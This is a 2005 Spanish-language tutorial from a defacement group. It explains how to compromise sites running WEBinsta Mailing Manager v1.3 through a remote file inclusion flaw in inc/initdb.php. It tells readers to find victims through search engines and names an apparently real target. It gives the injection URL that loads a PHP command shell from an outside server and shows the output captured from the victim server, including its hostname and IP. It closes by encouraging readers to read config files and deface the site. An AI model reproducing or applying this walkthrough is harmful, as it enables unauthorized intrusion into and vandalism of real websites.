############################################################################
*/
Http://Www.DefacersMexico.Org */ | Deface en WEBinsta Mailing v1.3
############################################################################
sh-2.05# ./ Escrito por Status-x [ phr4xz @gmail.com ] - Mexico
############################################################################
| * Bienvenida * |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Saludos, agradezco la participacion que han tenido en los foros con sus men
sajes y tambiena todos los que visitan la pagina ya que las visitas van muy
bien Smiley, esta vez les traigo un tutorial para hacer un deface en el sistema
WEBinsta Mailing Manager V1.3, el cual es vulnerable a file include Smiley
| * Buscando Victimas * |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Para buscar victimas usaremos Google Y Yahoo para encontrar mas resultados
hehehe en este caso yo encontre la web
http://www.oursupport.info/support/mailling/maillist/admin.phpSmiley ahora veamos como explotaremos la falla
| * Explotando el fallo * |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
La vulnerabilidad se encuentra en el archivo initdb.php que se encuentra en
el directorio /inc/, para explotar el fallo haremos lo siguiente:
Primero tenemos nuestra php-shell en un servidor
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
http://www.derf.hpgvip.com.br/newcmd.gif?&cmd=id||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Y a continuacion procedemos a hacer la inyeccion en el archivo vulnerable,
el fallo esta en la variable $absolute_path por lo cual nos quedaria la in
yeccion de la siguiente manera:
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
http://www.oursupport.info/support/mailling/maillist/inc/initdb.php?absolute_path=http://derf.hpgvip.com.br/newcmd.gif?&cmd=ls
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Y como vemos nos saldran todos los datos del servidor
####################################################################
sysname: Linux
nodename: dallas.hebergweb.com
release: 2.4.21-27.0.2.EL
version: #1 Wed Jan 19 02:20:34 GMT 2005
machine: i686
Script Current User: support
PHP Version: 4.3.10
User Info: uid(99) euid(99) gid(99)
Current Path: /home/support/public_html/support/mailling/maillist/inc
Server IP: 72.21.33.154
Web Server: Apache
#####################################################################
En este caso no tenemos permisos de escritura y el kernel NO es vulnerable
ya que cualquier kernel de Diciembre del 2004 a cualquier mes del 2005 no
son rooteables Smiley
Asi que podriamos leer el config.php y con suerte hacer un deface en el
index Smiley, pero OJO no el config que nos sale ahi, tenemos que buscar el que
guarda la configuracion del WEBInsta Manager Smiley
Gracias por leer este txt hasta el final Smiley
| * Despedida * |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Un saludo a todos los que leen este tutorial y si quieren que su nick aparez
ca en uno de estos textos en los saludos solo posteen en el foro
http://www.defacers.com.mx/foro/ en el subforo SIN CATEGORIA Smiley
############################################################################
sh-2.05b$ ./ exit
Copyright 2005 Defacers Mexico - No modificar sin permiso de su autor
Si publicas este texto en tu sitio por favor no lo modifiques
############################################################################
Si publicas este texto en tu sitio por favor no lo modifiques
Dicho y hecho
Saludos!
Autor